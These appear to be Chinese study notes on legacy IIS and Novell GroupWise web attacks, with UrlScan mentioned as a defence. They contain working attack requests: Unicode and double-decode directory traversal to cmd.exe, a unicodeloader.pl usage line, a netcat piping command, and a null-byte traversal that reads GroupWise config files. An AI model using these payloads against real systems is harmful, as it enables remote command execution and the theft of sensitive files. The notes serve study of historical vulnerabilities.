通过netcat进行管道传输,连接到一个脆弱的服务器上
Netcat –vv 网站< htr.txt
URLSCan 一个模板驱动的过滤器,向IIS解析请求
分为两种文件
分别是UrlScan.dll和UrlScan.iniUrlScan.ini为配置文件,
向被拒绝的请求发送http404,目标未发现
阻止***者获取任何一点有关目标服务器的信息
+.htr源代码泄露,MS01—004/default.asp+.htr
Web目录路径泄露 /null.idc
服务器端包含缓冲区溢出/file.stm,.shtm,shtml
.printer缓冲区溢出MS01—023/null.printer
索引服务器缓冲区溢出/null.ida,idq
Webhits源泄露MS00—006 /null.htw
Frontpage服务器扩展缓冲区溢出 MS01—035/_vti_bin/_vti_aut/fp3Oreg.dll
IIS目录遍历的脆弱点分别是Unicode和double decode***
讨论一些达到初始访问目的的机制,他们可以征服整个系统
GET/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+’c:\’http/1.0
http://网站/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
使用软件unicodeloader.pl
unicodeloader.pl 网站:80 C:\inetpub\scripts
Novell GroupWise任意文件的访问
http://网站/servlet/webacc?User.html=../../../../novell/WebAcess/webacc.cfg%00
这种***的另一个后果是:即使运行了生产商的补丁,novell安装的路径也会被暴露,同时会***者可能会窥视WEBacess目录中的commgr。Cfg和ldap.cfg文件中的敏感信息